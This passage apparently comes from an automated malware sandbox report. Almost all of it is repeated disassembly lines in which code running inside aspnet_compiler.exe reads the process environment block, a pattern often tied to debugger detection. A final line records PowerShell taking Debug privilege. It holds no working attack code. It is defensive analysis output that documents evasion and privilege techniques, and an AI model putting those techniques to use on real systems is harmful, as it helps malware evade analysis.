                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A3C0 mov eax, dword ptr fs:[00000030h]11_2_0105A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A3C0 mov eax, dword ptr fs:[00000030h]11_2_0105A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A3C0 mov eax, dword ptr fs:[00000030h]11_2_0105A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A3C0 mov eax, dword ptr fs:[00000030h]11_2_0105A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A3C0 mov eax, dword ptr fs:[00000030h]11_2_0105A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A3C0 mov eax, dword ptr fs:[00000030h]11_2_0105A3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010583C0 mov eax, dword ptr fs:[00000030h]11_2_010583C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010583C0 mov eax, dword ptr fs:[00000030h]11_2_010583C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010583C0 mov eax, dword ptr fs:[00000030h]11_2_010583C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010583C0 mov eax, dword ptr fs:[00000030h]11_2_010583C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D63C0 mov eax, dword ptr fs:[00000030h]11_2_010D63C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE3DB mov eax, dword ptr fs:[00000030h]11_2_010FE3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE3DB mov eax, dword ptr fs:[00000030h]11_2_010FE3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE3DB mov ecx, dword ptr fs:[00000030h]11_2_010FE3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE3DB mov eax, dword ptr fs:[00000030h]11_2_010FE3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F43D4 mov eax, dword ptr fs:[00000030h]11_2_010F43D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F43D4 mov eax, dword ptr fs:[00000030h]11_2_010F43D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110C3CD mov eax, dword ptr fs:[00000030h]11_2_0110C3CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010603E9 mov eax, dword ptr fs:[00000030h]11_2_010603E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E3F0 mov eax, dword ptr fs:[00000030h]11_2_0106E3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E3F0 mov eax, dword ptr fs:[00000030h]11_2_0106E3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E3F0 mov eax, dword ptr fs:[00000030h]11_2_0106E3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010863FF mov eax, dword ptr fs:[00000030h]11_2_010863FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104823B mov eax, dword ptr fs:[00000030h]11_2_0104823B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110A250 mov eax, dword ptr fs:[00000030h]11_2_0110A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110A250 mov eax, dword ptr fs:[00000030h]11_2_0110A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D8243 mov eax, dword ptr fs:[00000030h]11_2_010D8243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D8243 mov ecx, dword ptr fs:[00000030h]11_2_010D8243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104A250 mov eax, dword ptr fs:[00000030h]11_2_0104A250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056259 mov eax, dword ptr fs:[00000030h]11_2_01056259
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100274 mov eax, dword ptr fs:[00000030h]11_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054260 mov eax, dword ptr fs:[00000030h]11_2_01054260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054260 mov eax, dword ptr fs:[00000030h]11_2_01054260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01054260 mov eax, dword ptr fs:[00000030h]11_2_01054260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104826B mov eax, dword ptr fs:[00000030h]11_2_0104826B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E284 mov eax, dword ptr fs:[00000030h]11_2_0108E284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E284 mov eax, dword ptr fs:[00000030h]11_2_0108E284
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D0283 mov eax, dword ptr fs:[00000030h]11_2_010D0283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D0283 mov eax, dword ptr fs:[00000030h]11_2_010D0283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D0283 mov eax, dword ptr fs:[00000030h]11_2_010D0283
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E62A0 mov eax, dword ptr fs:[00000030h]11_2_010E62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E62A0 mov ecx, dword ptr fs:[00000030h]11_2_010E62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E62A0 mov eax, dword ptr fs:[00000030h]11_2_010E62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E62A0 mov eax, dword ptr fs:[00000030h]11_2_010E62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E62A0 mov eax, dword ptr fs:[00000030h]11_2_010E62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E62A0 mov eax, dword ptr fs:[00000030h]11_2_010E62A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A2C3 mov eax, dword ptr fs:[00000030h]11_2_0105A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A2C3 mov eax, dword ptr fs:[00000030h]11_2_0105A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A2C3 mov eax, dword ptr fs:[00000030h]11_2_0105A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A2C3 mov eax, dword ptr fs:[00000030h]11_2_0105A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105A2C3 mov eax, dword ptr fs:[00000030h]11_2_0105A2C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010602E1 mov eax, dword ptr fs:[00000030h]11_2_010602E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010602E1 mov eax, dword ptr fs:[00000030h]11_2_010602E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010602E1 mov eax, dword ptr fs:[00000030h]11_2_010602E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E6500 mov eax, dword ptr fs:[00000030h]11_2_010E6500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124500 mov eax, dword ptr fs:[00000030h]11_2_01124500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060535 mov eax, dword ptr fs:[00000030h]11_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060535 mov eax, dword ptr fs:[00000030h]11_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060535 mov eax, dword ptr fs:[00000030h]11_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060535 mov eax, dword ptr fs:[00000030h]11_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060535 mov eax, dword ptr fs:[00000030h]11_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060535 mov eax, dword ptr fs:[00000030h]11_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E53E mov eax, dword ptr fs:[00000030h]11_2_0107E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E53E mov eax, dword ptr fs:[00000030h]11_2_0107E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E53E mov eax, dword ptr fs:[00000030h]11_2_0107E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E53E mov eax, dword ptr fs:[00000030h]11_2_0107E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E53E mov eax, dword ptr fs:[00000030h]11_2_0107E53E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058550 mov eax, dword ptr fs:[00000030h]11_2_01058550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058550 mov eax, dword ptr fs:[00000030h]11_2_01058550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108656A mov eax, dword ptr fs:[00000030h]11_2_0108656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108656A mov eax, dword ptr fs:[00000030h]11_2_0108656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108656A mov eax, dword ptr fs:[00000030h]11_2_0108656A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084588 mov eax, dword ptr fs:[00000030h]11_2_01084588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01052582 mov eax, dword ptr fs:[00000030h]11_2_01052582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01052582 mov ecx, dword ptr fs:[00000030h]11_2_01052582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E59C mov eax, dword ptr fs:[00000030h]11_2_0108E59C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D05A7 mov eax, dword ptr fs:[00000030h]11_2_010D05A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D05A7 mov eax, dword ptr fs:[00000030h]11_2_010D05A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D05A7 mov eax, dword ptr fs:[00000030h]11_2_010D05A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010745B1 mov eax, dword ptr fs:[00000030h]11_2_010745B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010745B1 mov eax, dword ptr fs:[00000030h]11_2_010745B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E5CF mov eax, dword ptr fs:[00000030h]11_2_0108E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E5CF mov eax, dword ptr fs:[00000030h]11_2_0108E5CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010565D0 mov eax, dword ptr fs:[00000030h]11_2_010565D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A5D0 mov eax, dword ptr fs:[00000030h]11_2_0108A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A5D0 mov eax, dword ptr fs:[00000030h]11_2_0108A5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107E5E7 mov eax, dword ptr fs:[00000030h]11_2_0107E5E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010525E0 mov eax, dword ptr fs:[00000030h]11_2_010525E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C5ED mov eax, dword ptr fs:[00000030h]11_2_0108C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108C5ED mov eax, dword ptr fs:[00000030h]11_2_0108C5ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01088402 mov eax, dword ptr fs:[00000030h]11_2_01088402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01088402 mov eax, dword ptr fs:[00000030h]11_2_01088402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01088402 mov eax, dword ptr fs:[00000030h]11_2_01088402
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104C427 mov eax, dword ptr fs:[00000030h]11_2_0104C427
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104E420 mov eax, dword ptr fs:[00000030h]11_2_0104E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104E420 mov eax, dword ptr fs:[00000030h]11_2_0104E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104E420 mov eax, dword ptr fs:[00000030h]11_2_0104E420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6420 mov eax, dword ptr fs:[00000030h]11_2_010D6420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A430 mov eax, dword ptr fs:[00000030h]11_2_0108A430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110A456 mov eax, dword ptr fs:[00000030h]11_2_0110A456
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E443 mov eax, dword ptr fs:[00000030h]11_2_0108E443
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104645D mov eax, dword ptr fs:[00000030h]11_2_0104645D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107245A mov eax, dword ptr fs:[00000030h]11_2_0107245A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DC460 mov ecx, dword ptr fs:[00000030h]11_2_010DC460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107A470 mov eax, dword ptr fs:[00000030h]11_2_0107A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107A470 mov eax, dword ptr fs:[00000030h]11_2_0107A470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01124A80 mov eax, dword ptr fs:[00000030h]11_2_01124A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01088A90 mov edx, dword ptr fs:[00000030h]11_2_01088A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058AA0 mov eax, dword ptr fs:[00000030h]11_2_01058AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01058AA0 mov eax, dword ptr fs:[00000030h]11_2_01058AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6AA4 mov eax, dword ptr fs:[00000030h]11_2_010A6AA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6ACC mov eax, dword ptr fs:[00000030h]11_2_010A6ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6ACC mov eax, dword ptr fs:[00000030h]11_2_010A6ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A6ACC mov eax, dword ptr fs:[00000030h]11_2_010A6ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050AD0 mov eax, dword ptr fs:[00000030h]11_2_01050AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084AD0 mov eax, dword ptr fs:[00000030h]11_2_01084AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084AD0 mov eax, dword ptr fs:[00000030h]11_2_01084AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108AAEE mov eax, dword ptr fs:[00000030h]11_2_0108AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108AAEE mov eax, dword ptr fs:[00000030h]11_2_0108AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01108D10 mov eax, dword ptr fs:[00000030h]11_2_01108D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01108D10 mov eax, dword ptr fs:[00000030h]11_2_01108D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD00 mov eax, dword ptr fs:[00000030h]11_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD00 mov eax, dword ptr fs:[00000030h]11_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD00 mov eax, dword ptr fs:[00000030h]11_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01046D10 mov eax, dword ptr fs:[00000030h]11_2_01046D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01046D10 mov eax, dword ptr fs:[00000030h]11_2_01046D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01046D10 mov eax, dword ptr fs:[00000030h]11_2_01046D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01084D1D mov eax, dword ptr fs:[00000030h]11_2_01084D1D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
